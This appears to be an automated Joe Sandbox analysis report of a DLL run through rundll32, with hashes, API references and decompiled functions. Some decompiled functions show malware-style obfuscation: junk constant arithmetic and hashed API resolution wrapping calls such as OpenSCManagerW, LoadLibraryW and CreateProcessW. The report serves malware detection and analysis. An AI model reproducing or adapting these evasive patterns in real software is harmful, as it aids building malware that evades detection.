Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: AllocVirtual$und_memcpy
String ID:
API String ID: 459566808-0
Opcode ID: 11ac3337eff717a2e9eb1217d834842c62d5a6f0c60645295981bb44394c6659
Instruction ID: 3a73c48f6b60900e827596c0a710fe36c4357a7f1bbc63153c5bd30976a621be
Opcode Fuzzy Hash: 11ac3337eff717a2e9eb1217d834842c62d5a6f0c60645295981bb44394c6659
Instruction Fuzzy Hash: 4E3178B2A00116AFEB10CF58DD85F9AB7E8EF08790F118015FA04EB245D770EC60CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000398B, Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 100039D8

Part of subcall function 1000451E: InitializeSListHead.KERNEL32(1004DF98,100039E2,1004AEE8,00000010,10003973,?,?,?,10003B9B,?,00000001,?,?,00000001,?,1004AF30), ref: 10004523

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 10003A42
___scrt_fastfail.LIBCMT ref: 10003A8C

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 2097537958-0
Opcode ID: 27b01fdb1fa95ff07f807f6bc47a04103217dde56c149050e7867ec21a409724
Instruction ID: aaaeb18818c0cc7d7fa6837dad01f7d3ce33b48f6eafd4b856e1f1e091e85652
Opcode Fuzzy Hash: 27b01fdb1fa95ff07f807f6bc47a04103217dde56c149050e7867ec21a409724
Instruction Fuzzy Hash: 2B2138397086526EFB06EB788D033DE3399DF032E5F108029E581A71D7CFB16540C61A

Uniqueness

Uniqueness Score: -1.00%

Function 10028D2F, Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 10028D38
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 10028DA6

Part of subcall function 10028BDD: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,1002B316,10032FF6,0000FDE9,00000000,?,?,?,10032D5E,0000FDE9,00000000,?), ref: 10028C89

Part of subcall function 10024214: RtlAllocateHeap.NTDLL(00000000,00000000,70D9FFF6,?,1002B00A,1004B440,00000018,00000003), ref: 10024246

_free.LIBCMT ref: 10028D97

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: 13c1f5a0f658e28ba005cb8ea1a88993c2b4061e6ffaa2c2eeee22f86365a62f
Instruction ID: 716052fe855ea13665ebf5abd246c7cbf7d1e3688c183941c68cdbe58b348785
Opcode Fuzzy Hash: 13c1f5a0f658e28ba005cb8ea1a88993c2b4061e6ffaa2c2eeee22f86365a62f
Instruction Fuzzy Hash: 3F01F7BA6032113B776186B67C88C7F2AEDCDC29A03950128FE04D2182EE609E0583B1

Uniqueness

Uniqueness Score: -1.00%

Function 10027FC1, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(E8458D00,?,?,?,00000000), ref: 10027FF3

Strings

, xrefs: 10028038

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 3a224a1f1f04e7e62542cf44cd4d6c34aff0542209651b92aeebe781e589c52f
Instruction ID: e87e1bac75f9c46fc66be9f70f9a8a28e7f0d75fdbebaedb1d1c5d1f5bc6a8a6
Opcode Fuzzy Hash: 3a224a1f1f04e7e62542cf44cd4d6c34aff0542209651b92aeebe781e589c52f
Instruction Fuzzy Hash: 644158745052989BEB61CA14DDC4BEB7BFDEB15304FA044ACFACA87082D235AF498B10

Uniqueness

Uniqueness Score: -1.00%

Function 00B22959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00B22959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E00B2602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E00B307A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x00b2295f
0x00b22964
0x00b22967
0x00b2296a
0x00b2296d
0x00b2296e
0x00b2296f
0x00b22977
0x00b22985
0x00b2298a
0x00b22992
0x00b2299a
0x00b229a2
0x00b229a9
0x00b229b0
0x00b229b7
0x00b229bb
0x00b229cf
0x00b229dc
0x00b229e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 00B229DC

Strings

<^, xrefs: 00B22977

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: f08f15355c7c31edd8a8a87ae846954ba8881d82bdb1f0a749b96e894e63f85e
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: 33018072A00108BFEB14DF95DC4A8DFBFB6EF44310F108088F508A6250D7B69F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 00B2C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00B2C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E00B2602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E00B307A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x00b2c6e1
0x00b2c6e6
0x00b2c6f0
0x00b2c6fc
0x00b2c703
0x00b2c706
0x00b2c70d
0x00b2c711
0x00b2c715
0x00b2c71c
0x00b2c723
0x00b2c72a
0x00b2c731
0x00b2c738
0x00b2c751
0x00b2c762
0x00b2c768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 00B2C762

Strings

/O, xrefs: 00B2C6E6

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 8eda8ff119503d5ecb281bfdfa5ab9e28a8497bdc16dea8ed56f3d4312c81980
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: D71133B290122DBBCB25DF94DC498DFBFB8EF04714F108188F90962210D3714B65ABE0

Uniqueness

Uniqueness Score: -1.00%

Function 00B21000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00B21000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E00B2602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E00B307A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x00b21006
0x00b21009
0x00b2100c
0x00b21011
0x00b21016
0x00b2101d
0x00b21026
0x00b2102d
0x00b21034
0x00b2103b
0x00b21047
0x00b2104f
0x00b21057
0x00b2105e
0x00b21065
0x00b2106c
0x00b21073
0x00b21077
0x00b2108b
0x00b21096
0x00b2109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00B21096

Strings

[, xrefs: 00B2103B

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: fe5fb166a2646b2d6281409dfa349453a0b429999c099ed97e65975c0bf0dc19
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: 89016DB6D0130CFBDF04DFA4C94A6DEBBB1EF54318F108188E41466291D3B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 00B24859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B24859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E00B307A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x00b2485e
0x00b2487a
0x00b2487d
0x00b24884
0x00b2488b
0x00b24892
0x00b2489d
0x00b248a0
0x00b248ad
0x00b248b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 00B248B7

Strings

[, xrefs: 00B2488B

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: 627523564e1a7e233f82e49972f365f739ee3d0c873c36647b79c2da5104a6b6
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: B6F0F4B0A15209FBDB04CFA8CA5699EBFB9AB40301F208188E444A7290E2B15F509A50

Uniqueness

Uniqueness Score: -1.00%

Function 1002A310, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNELBASE(?,?), ref: 1002A350

Strings

InitializeCriticalSectionEx, xrefs: 1002A320

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: c29a7883f4539586945b36bb1f00055c7dd39741731306cf3fc9d944f25f1b99
Instruction ID: 89e2b04c8fbb43218a6618a6d479a3faddb58d8543dff9c8057a59943af156c2
Opcode Fuzzy Hash: c29a7883f4539586945b36bb1f00055c7dd39741731306cf3fc9d944f25f1b99
Instruction Fuzzy Hash: FAE09A32900228B7CB12AF50DC08CDE7F25EF053A1BA08020FE0C99222CB728D20ABC4

Uniqueness

Uniqueness Score: -1.00%

Function 1002A047, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 1002A07B

Strings

FlsAlloc, xrefs: 1002A057

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 5c722b4938ba971166e469df948cf8ca82532ba69aa15712d9b066e3c7964253
Instruction ID: e297e765f5911ce58cd0a3eb98764831447a74d013a8c1969b92fd57f96cda80
Opcode Fuzzy Hash: 5c722b4938ba971166e469df948cf8ca82532ba69aa15712d9b066e3c7964253
Instruction Fuzzy Hash: BAE0C23254023477D311A2A06C44DCE7E44DFA27A2BA00034FF08E2111DF661C5185DD

Uniqueness

Uniqueness Score: -1.00%

Function 100283B2, Relevance: 3.2, APIs: 2, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 10027EC5: GetOEMCP.KERNEL32(00000000,1002815C,?,10010887,1004E520,1004E520,10010887), ref: 10027EF0

IsValidCodePage.KERNEL32(-00000030,00000000,75FF016A,?,?,?,100281A3,?,00000000,?,?,?,?,?,?,1004E520), ref: 10028410
GetCPInfo.KERNEL32(00000000,100281A3,?,?,100281A3,?,00000000,?,?,?,?,?,?,1004E520,10010887), ref: 10028452

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: af854a28b99d946c68302d2f227090b7555cb399ba289a87278f2c3e4cfc777a
Instruction ID: 1292c3733ea5ef0b459f7b4b9d6145809bbcf0ab6f8e350e1ac26d0884e01cb9
Opcode Fuzzy Hash: af854a28b99d946c68302d2f227090b7555cb399ba289a87278f2c3e4cfc777a
Instruction Fuzzy Hash: E6513578A017568FDB20DF75E8406ABBBE5EF41344F90806FE086CB251E734EA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10028141, Relevance: 3.1, APIs: 2, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 10027EC5: GetOEMCP.KERNEL32(00000000,1002815C,?,10010887,1004E520,1004E520,10010887), ref: 10027EF0

_free.LIBCMT ref: 100281B9

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b6c1b75cf25582137791295a8fb0e9fc90189f29a5ca7fb7a3f68677a9a9983f
Instruction ID: b54d8657c3404ae1227455dc142fa3ead591e73700c1e05800aa58c25d242379
Opcode Fuzzy Hash: b6c1b75cf25582137791295a8fb0e9fc90189f29a5ca7fb7a3f68677a9a9983f
Instruction Fuzzy Hash: 1531A379900249AFDB01DFA8E840A9E77F8FF44354F51016AF915DB2A1EB31AE11CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002B89A, Relevance: 3.1, APIs: 2, Instructions: 66COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 1002B8C8
_free.LIBCMT ref: 1002B8EE

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: c8e5d362ea8495ed27514b8f8baf0cd57b7e06fc4690afc6db75ee4dc2175301
Instruction ID: 2a755c13c050d183703ed98df87f73a555c2f74e7236858a3b8186707cbcc6ed
Opcode Fuzzy Hash: c8e5d362ea8495ed27514b8f8baf0cd57b7e06fc4690afc6db75ee4dc2175301
Instruction Fuzzy Hash: 6911E671A046625BF720DB28BD85B0533E8D742374F99072AF629DB2D1EA70DC828384

Uniqueness

Uniqueness Score: -1.00%

Function 100024F7, Relevance: 3.1, APIs: 2, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,00004000,00000000,00000000,?,100026AE,?,?,?,00000018,00000000,00000000,?), ref: 1000253C
VirtualProtect.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,100026AE,?,?,?,00000018,00000000,00000000,?), ref: 10002585

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Virtual$FreeProtect
String ID:
API String ID: 2581862158-0
Opcode ID: 1386b0ded374da49f1cd6f70c6048c5dd5653c1bca3ca1c7d211eb0841789e4e
Instruction ID: e51ceea41273e8a754766f9e864be966224bb85f234d35eeffc3d3ca3a938713
Opcode Fuzzy Hash: 1386b0ded374da49f1cd6f70c6048c5dd5653c1bca3ca1c7d211eb0841789e4e
Instruction Fuzzy Hash: 8211E032B009158FE304DE09CCA0F16B7AAFF957A1F868158E806CB265DB30ED80CA84

Uniqueness

Uniqueness Score: -1.00%

Function 1001108A, Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 100110D2

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 136e8264bd6b277982498fb8982027de4c9d58594c2cae3cb06861e7f2875850
Instruction ID: 0111380563e3a9ff58851abe999957ead0dd13a3de9bd6ab037c1be5c9088953
Opcode Fuzzy Hash: 136e8264bd6b277982498fb8982027de4c9d58594c2cae3cb06861e7f2875850
Instruction Fuzzy Hash: 89E0E53AD0A5B142F327D77A7D0129E16C5DB86376F110326F820CF1D1DFB089C15596

Uniqueness

Uniqueness Score: -1.00%

Function 00B34F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00B34F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E00B2602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E00B307A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00b34f80
0x00b34f81
0x00b34f82
0x00b34f86
0x00b34f87
0x00b34f8c
0x00b34fa5
0x00b34fa8
0x00b34faf
0x00b34fb6
0x00b34fc7
0x00b34fca
0x00b34fd7
0x00b34fe2
0x00b34fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00B34FE2

Strings

{#lm, xrefs: 00B34FC2

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: 495a50245236cb98ffa4cbb3e71f9ee54d8faeb7c36e0fa4834d6e50782f652d
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: 57F037B081120CFFDB04EFA4D98289EBFBAEF40300F208199E808AB250D3715B50AB50

Uniqueness

Uniqueness Score: -1.00%

Function 10005B14, Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10005B32
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10005B3D

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 17f7976ac9e9d55e73ccc180a4db989e266e98219e045f9a63b873bfabc5d0aa
Instruction ID: 5cd2f35f43c97ca4945b5701e3fc13db3cba3f53332ee10a1f45c835a382b29d
Opcode Fuzzy Hash: 17f7976ac9e9d55e73ccc180a4db989e266e98219e045f9a63b873bfabc5d0aa
Instruction Fuzzy Hash: D5D0C979508242987924F6B56D02A8F7384DB021F6B616267E620CA0CAEF23B4466A35

Uniqueness

Uniqueness Score: -1.00%

Function 00B3976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E00B3976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00B2602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E00B307A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x00b39772
0x00b39773
0x00b39778
0x00b3977a
0x00b3977b
0x00b3977e
0x00b3977f
0x00b39782
0x00b39785
0x00b39788
0x00b39789
0x00b3978c
0x00b3978f
0x00b39790
0x00b39791
0x00b39794
0x00b39797
0x00b3979a
0x00b3979d
0x00b397a0
